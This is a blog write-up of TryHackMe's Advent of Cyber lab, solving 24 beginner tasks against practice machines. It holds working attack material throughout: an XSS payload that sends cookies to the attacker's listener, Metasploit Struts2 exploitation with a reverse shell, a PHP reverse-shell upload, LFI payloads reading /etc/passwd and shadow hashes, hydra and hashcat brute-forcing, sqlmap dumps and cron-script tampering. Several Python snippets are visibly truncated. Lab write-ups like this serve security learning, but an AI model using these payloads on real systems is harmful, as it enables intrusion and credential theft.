Planet DesKel

DesKel's official page for CTF write-up, Electronic tutorial, review and etc.

15 August 2020

THM write-up: Advent of Cyber

29 minutes to read



Good day and merry Christmas, welcome to another THM CTF write-up. This is a special event created by THM where users have to solve all 24 tasks. Also, this room is specially designed for beginners who wish to learn more about basic hacking and pentesting. The task is easy with supporting material and it good for those have absolutely zero knowledge in hacking. The write-up gonna be tedious after the THM hackback 2019, so bear with me. You can click on the permalink to locate yourself to the specific challenge. Let’s get started.

The first task of the challenge is about hijacking the session by altering the cookie value. You need to register and login yourself first and I name this account as user mama. After that, press F12 and find the cookie.


For your information, the value is encoded with base64.


These first few characters contain the username mama while the rest is gibberish. Now, we are going to create a longer user name like hijackingthecookie.

more base64

By comparing the previously decoded cookie, the last 11 characters (censored) are fixed. To hijack into the mcinventory’s account, simply encode the following text.

mcinventory<the last 11 characters>

Copy the encoded text and paste on it.


Refresh the page and you got yourself inside mcinventory account.

flag 1

Day 2 (Task 7): Directory brute-force and OSINT

This task involved two elements which are directory brute-force and OSINT. For this write-up, I’m going to use gobuster with the following command.

gobuster dir -u http://<machine IP>:3000 -w /usr/share/dirb/wordlists/common.txt


There is one particular directory gain our interest. Visiting the hidden directory and reading the source code, we got the following.

source code

Time to do a little bit of OSINT. Visit the legit GitHub site and search for arctic digital design.


We just hit the jackpot. Read the repo and you should find something interesting.


Use the credential and login to the admin portal. Don’t forget to read the message.

flag 2

Day 3 (Task 8): Reading packet

Download the packet file and read it using the Wireshark. Read packet ID 998 for the sake of the challenge.

packet 998

Time to find something useful. To make things simple, it is good to follow the TCP stream. To do it, simply select any TCP packet, right-click and follow the TCP stream.

TCP stream

All the information for the challenge is located on stream 1.

stream 1

flag 3

To crack buddy’s hashed password, simply punch in the following command. (By referring to the hashcat example, the hash is sha512crypt)

hashcat -a 0 -m 1800 hash /usr/share/wordlists/rockyou.txt

If you are running the hashcat on VM, put –force flag.

Day 4 (Task 9): Linux challenge

This task going to test your understanding of the Linux command. Refer to the supporting material if you wanted to know more. Login into the machine via SSH shell.

visible files


Read a file


File the strings


Find the IP address

more grep

Check user


File integrity


Finding the hash

For your information, all user’s hash is stored in /etc/shadow. The problem is, you can’t simply read the file due to permission issues. Sometimes, you can find the backup somewhere inside the system folder.


We have permission to read the backup file.

flag 4

Day 5 (Task 10): OSINT

Download the picture and examine the metadata using ExifTool.


We found a small piece of information regarding the creator’s name. A quick google search on the name yielding the following twitter page.


Visting the WordPress by elf Lola redirect us to the following page


Problem is, how do we know the first photograph being published by Lola? Ever heard waybackmachine where people like to dig back the old stuff. Copy and paste the link in the waybackmachine, you got the following list of the archive.


The earliest date is on October. Click on the date and visit the archived page.


Something is different compared to the latest one. To check with the lazy name, click onto the picture or do a reverse search using TinEye.

flag 5

Day 6 (Task 11): Extract files from the packet

Download the file and open it up with the Wireshark. Examine the UDP stream by right-clicking any DNS packet.

udp stream

Looking at streams 2,3,4 and 5, you will come across something interesting.

the stream

The data is encoded as base16 or hex. After that, in Wireshark navigate yourself File -> Export object -> HTTP and download the two files (.zip and .jpg)


The zip is password protected. Use fcrackzip or john to crack the password. In this case, I used the john.

zip2john > hash
john hash


There is another file hidden inside the Tryhackme.jpg. Use steghide (without the password) to extract the file.


flag 6

Day 7 (Task 12): Nmap

Launch your Nmap scanner with the following command

nmap -p0-1000 -A -v <machine IP>

Read all the available on the result screen and submit the answer.

flag 7

Don’t forget to check Port 999. There is something inside the server.

Day 8 (Task 13): SUID file exploit

Do the Nmap fast scan using the following command

nmap -p- -v --min-parallelism 100 <machine IP>

more nmap

scan ssh

Look like we have something on port 65534, a further scan of the port is a result of open SSH. Login to the machine via SSH shell with the following command

ssh -p 65534 holly@<machine IP>

After that, search for SUID files.

find / -perm /4000 2>/dev/null


We found something interesting on the list of finding. By checking the find SUID from GTFObin, we can escalate as user igor.

as igor

To escalate as the root user, we need to find a suspicious SUID file. By looking at the timestamp, we found a recent SUID when the machine is created.


Let’s run the command.

flag 8

We can literally do anything as the root by running the binary.

Day 9 (Task 14): Python requests

Visiting the website will return the JSON result. Copy the following script and run it with python.


import requests
import json

path = "f"
value = ""
host = ""

while 1:
	response = requests.get(host + path)
	dict_data =  json.loads(response.text)
	path = dict_data["next"]
	if path == "end":
	value = value + dict_data["value"]


flag 9

Day 10 (Task 15): Metasploit

First of all, perform an Nmap scan and search for any possible open port.

nmap nmap

Look like we have the webserver running on the machine. After that, do a Nikto scan on the webserver and search for any vulnerability.


The server is vulnerable to strutshock or CVE-2017-5638. By checking the information on the CVE, we understand that the vulnerable somehow related to the Jakarta Multipart parser in Apache Struts. Fire up our Metasploit with the following command.


After that search for struts2 modules.


We have located the vulnerability. Use the module and do the following configuration.

msf5 > exploit/multi/http/struts2_content_type_ognl
msf5 > set RHOST <machine IP>
msf5 > set RPORT 80
msf5 > set TARGETURI /showcase.action
msf5 > set payload linux/x86/meterpreter/reverse_tcp
msf5 > exploit

flag 10

And get the open shell. Enumerate your way to /home/santa to capture the credentials. Remember, the machine you are currently exploiting is inside a docker which means you are not entirely controlling the machine even you are a root user. There is a way to escape the docker. Visit this room to learn more.

Login to the SSH with the newly captured credentials. To extract the specific line from the file, simply input the following command.

sed '100q;d' naughty_list.txt

The above command extract the 100th line from the naughty_list.txt. Give it a try!

Day 11 (Task 16): Accessing the file system


Check the NFS of the server with the following command

showmount -e  <machine IP>


To mount with the NFS, firstly create a directory named nfs after that mount the NFS with the following command.

mount <machine IP>:/opt/files /root/Desktop/THM/xmas/nfs

mount nfs

Remember to unmount the nfs after you are done with the challenge.

umount -f -l nfs


Visit the FTP server with the following command.

FTP <machine IP>

Log in to the server with user anonymous with a blank password.


Download the file with get and read the txt file for the SQL username and password.

Task 16-3: MySQL

Login to the SQL server with the following command.

mysql -u <username> -h -p<password>

Make sure the -p is stick with the password (no space). After that, navigate and read the flag with the following SQL command.

mysql > USE data;

flag 11

Day 12 (Task 17): File decryption

Download and unzip the file. To do an md5 checksum on the file 1, simply use this command.

md5sum note1.txt.gpg


Punch in the command to decrypt the gpg file

gpg note1.txt.gpg

The password is 25daysofchristmas

To decrypt the asymmetrically encrypted file with the private key, follow the following command.

openssl rsautl -decrypt -inkey private.key -in note2_encrypted.txt -out note2.txt

The password is hello.

Day 13 (Task 18): Capture the flag

This task is created by the darkstar. I named this task as CTF as it involves some enumeration, exploits and privilege escalation. You might encounter bugs while performing some recon and exploit. First and foremost, let’s do a full scan on the server with ping skip.

nmap -Pn -A -v <machine IP>

yes nmap

We have two services running on the machine, specifically port 80 (HTTP) and port 3389 (RDP). Let’s do a visit to the HTTP server.


A default windows server welcome page. Huh… nothing we can do here except brute-forcing the server. Time to fire up our gobuster

gobuster dir -u <machine IP> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Alright, we got an interesting directory called /retro. Let’s do some reading on the blog. After a short recon, I stumbled across the following in one of the blog posts.


It could be the password for the webserver. Actually it is, you can log in into the WordPress dashboard with username wade and the password.


Stop right there! There is nothing you can do with the WordPress dashboard that including generates a reverse shell page. Still, remember we have one more service yet to explore, the RDP. For this task, I’m going to use remmina instead of rdesktop, this is because I faced some problems with connecting the server with rdesktop.

Using the username wade and the password you just found to log in to the RDP service.


We are now inside the desktop. If you open up the google chrome and check on the bookmark bar, you come across a CVE number.


After a short google search on the CVE, I came across the following gif. It explains how the exploit works. The executable is located inside the recycle bin, restore and run it. However, you will get the infamous grey ok button that stops you from proceeding with the exploit.


A big thanks to the creator of the room, darkstar. The grey button is intentioned for the challenge. The author mentioned the chrome is installed and set as default for administrator user. Such setup causes a glitch in the Windows Server 2016. There is a consistent fix for the glitch which opens up both Chrome and IE browsers and then launches the exploit

Darkstar also mentioned there are two other usual ways on fixing the bug which is


I have tested the above fix mentioned by darkstar it works like a charm.

flag 13

Day 14 (Task 19): AWS

Since we have the bucket name, it makes the thing quite simple. Visit the following URL


After that read the content inside the text file.

flag 14

Day 15 (Task 20): Local file inclusion (LFI)

Visit the website and look at the source code.


Look like the server pulling the text file from view/notes directory. Take note to the URL directory which in charge of pulling the file, /get-file/. We need to draft a URL for pulling the /etc/passwd from the server.

http://<machine IP>/get-file/../../../../../../../../../etc/passwd

Put the return directory symbol (../) as much as you like, the more the better. we are doing directory traverse now.


We have a situation right now. To bypass the filter, try URL encoding by changing the ‘/’ into %2f.

http://<machine IP>/get-file/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd


Now we talking. Find charlie’s hash file from the shadow file.


Copy the hash and crack it using hashcat.

hashcat -a 0 -m 1800 hash /usr/share/wordlists/rockyou.txt --force


After cracking the hash, login to user Charlie’s ssh shell and capture the flag.

flag 15

Day 16 (Task 21): Python file system

You are required to write a python to unzip, calculate and find the content of files. Make sure you understand the code.

Count the number of the unzipped file

The following is the python code for the task.

import zipfile
import os

count = 0

#Extract the primary file
with zipfile.ZipFile('','r') as zip_decom1:

#read and extract each zip file to decom2
ListFile = os.listdir('decom1')
for l in ListFile:
	with zipfile.ZipFile('decom1/' + l,'r') as zip_decom2:

# calculate the number of file (exclude .zip)
ListFile = os.listdir('decom2')
for l in ListFile:
	if 'zip' not in l:
		count = count + 1
print("Number of extracted file: " + str(count))

Find the file with specific metadata

This task requires the challenger to find the number of files labeled with Version 1.1.

import os
import exiftool

m_count = 0
file = []

# Read all the metadata in decom2 and scan for 'version 1.1' metadata
ListFile = os.listdir('./')
for l in ListFile:

with exiftool.ExifTool() as et:
        metadata = et.get_metadata_batch(file)
for d in metadata:
                        m_count = m_count + 1

print("Number of files in version 1.1: " + str(m_count))

Find the file with specific content

import os

# read all file in decom 2 and find the file with 'password'
ListFile = os.listdir('decom2')
for l in ListFile:
	f = open('decom2/' + l,'r')
	data =

	if "password" in data:

Day 17 (Task 22): Hydra

Brute-force the HTTP-post-form

The hint is a joke, do not trust it. The password is located around 900k+ in rockyou.txt. I will make another exception for this task by revealing the password.

hydra -l molly -p joyness1994 <machine IP> http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"


hydra password

Login molly’s credentials on the webpage and capture the flag.


Brute-force the SSH

Use the following command to brute-force the SSH service.

hydra -t 64 -l molly -P /usr/share/wordlists/rockyou.txt ssh://<machine IP>

ssh hydra

Login into the server and capture the flag.

flag 17

There is a lot of ways of solving this task. As for my approach, I’m going to create a PHP script and steal the admin cookie. For the sake of simplicity, the script only contains one single line and extremely unrealistic.

        $cookie = $_GET["c"];

After that, launch the PHP server (run the command inside the directory contains the PHP script) to listen to any incoming request.

php -S <tun IP>:8000

make sure you change the tun IP according to your own VPN IP in THM. After that , register yourself in the webserver and inject the following script in the comment section.

<script>document.location='http://<tun IP>:8000/cookie.php?c='+document.cookie;</script>

Change the tunnel IP too.


Wait for 2 minutes and the admin ‘s cookie will show in front of your screen.

flag 18

Day 19 (Task 24): Command injection

Almost similar to the local file inclusion (task 20), you gonna play around with the URL. For starter, let’s test the injection with the following URL.

http:/<machine IP>:3000/api/cmd/ls

ls file

The result contains a list of the main file system directory. By doing a small recon, the flag is located at /home/bestadmin


Read the file and capture the flag.

flag 19

Day 20 (Task 25): Cronjob

First and foremost, do a Nmap scan.

nmap -p4000-5000 -A -v <machine IP>

love nmap

Look like we have port 4567 (SSH) service running on the machine. As for the next task, we need to brute force the service with username sam.

hydra -s 4567 -t 64 -l sam -P /usr/share/wordlists/rockyou.txt ssh://<machine IP>

sam pass

We got the password. Time to login to the shell.

first flag

There is one particular script in /home/scripts that raises suspicion to us. Let’s read the content.


The script just doing some cleaning on the /tmp. How does it look suspicious? Let’s check the timestamp of /tmp.


Did you see the time differences? It is very close. My hypothesis is the is inside the cronjob list from the user ubuntu. Let’s see what is our permission on the script.


Well, we can temper the script as a low-privilege user. For your information, you can’t privilege escalate as the root user yet because the file belongs to ubuntu. You can use the following command to pull the flag from the ubuntu.

echo "cat /home/ubuntu/flag2.txt > /home/scripts/flag2.txt" >

flag 20

Day 21 (Task 26): Reverse engineering (basic)

I’m going to use IDA reverse engineering tool for the entire RE challenge. You can refer to my ELF RE write-up to know more about IDA. Check challenge1 for the challenge. file1 is a decoy.

static analysis


Debugging 1

Put a breakpoint (Pressing F2) after imul instruction.


Run the program (green play button) and hover to the eax register for the answer.

Debugging 2

Put a breakpoint (Pressing F2) before the pop instruction.

flag 21

Run the program (green play button) and hover to the var_4 or eax for the answer.

Day 22 (Task 27): Reverse engineering (conditional)

This RE task involved with if conditional sentence.


var_8 = 8
var_4 = 2

if (var_8 < var_4)
     var_4 += 7
     var_8 += 1

Since var_8 is always bigger than var_4, it made the if statement false. The branch will follow the red wire. By wrapping this up, you should get the answers.

Day 23 (Task 29): SQL injection

For this SQli, I’m going for the easy way. First and foremost, Launch the burp suite and visit the LapLand login page. After that, try to login as a random user (invalid credential) and capture the request from the burp suite.


Copy the request and save it as r.txt. After that, run the following command to initiate the injection to find out the list of the possible database.

sqlmap -r r.txt --dbs --batch



We got one particular parameter that is vulnerable to the injection. After a short run, we are able to determine the databases. The next step is to list all the tables inside the database (name censored) with the following command.

sqlmap -r r.txt -D <Censored Db name> --table --batch


Looks like we found a list of tables. For this time being, we are only interested in the last table. As for the next step, enumerate the content inside the table.

sqlmap -r r.txt -D <Censored Db name> -T <Censored table name> --column --batch


Let’s pull some data from the column. You are required to use –dump.

sqlmap -r r.txt -D <Censored DB name> -T <Censored table name> -C email,username,password  --batch --dump


We just found Santa’s email and hashed password from the database. I strongly recommend you to skip the hash cracking part. Simply copy Santa’s MD5 hash and crack it using the online tool. Now, we are able to login to Santa’s social account.


By the way, there is one secret inside Santa’s inbox.

santa secret

Alright, time to reverse the shell. Firstly, download the PHP reverse shell payload via this page. Save the file as .phtml instead of .php as the standard PHP filename has been filtered by the page. Before upload and submit the payload, make sure you have the listener opened in your terminal.

nc -lvnp 1234

After uploading the file, locate the following URL.

http://<machine IP>/assets/images/posts/

phtml name

Click on the .phtml file we just uploaded and listen to the shell.


The flag is located at /home/user

flag 23

Day 24: ELF (Elastic Search, Kibana and Log Stash )

First and foremost, launch your Nmap scanner.

Looks like we found Port 22 (SSH), Port 8000 (HTTP) and Port 9200 (Elasticsearch) on the target machine. For your information, you can’t log in to the SSH and the only way in is Port 8000 and Port 9200. Let’s do a check on Port 9200.

There is one good material to kick start with the port 9200. To pull the password from the database, simply do a query search.

http://<machine IP>:9200/_search?q=password

password query

There is nothing you can do with the credential, let’s proceed to port 8000. In the port, there is something called the Kibana log. By looking at the log, I stumbled across another open service on port 5601

kibana log

After doing the Nmap scan, port 5601 can be accessed via the browser.

kibana web

Let’s check the version in the management tab.


After doing a quick google search on the Kibana version, I came across the LFI attack CVE-2018-17246. I try to locate the following payload address to validate vulnerably.

http://<machine IP>:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../../../../etc/passwd

After that, revisit the log file from port 8000, you will notice something interesting.


We just read the content from /etc/passwd. This vulnerable is valid. As for the flag, it is located at the root file system (Not in the /root directory).

http://<machine IP>:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../../../../root.txt

flag 24

It is hard to locate the flag as it only contains a few letters. Well, actually there are other ways by using the console.


This is it, congratulation on completing all 24 tasks. What a challenge! A big thanks to the THM and the task creators who create those challenges we didn’t deserve for. Good job and keep on keeping on, I look forward to the next cyber advent challenge. Until next time ^^ and happy new year

tags: tryhackme - CTF - session_hijack - osint - forensic - networking - linux - recon - script - web - metasploit - mount - aws - lfi - brute_force - xss - command_injection - cronjob - sqli - elastic_search - kibana

Thanks for reading. Follow my twitter for latest update

If you like this post, consider a small donation. Much appreciated. :)


© 2020 DesKel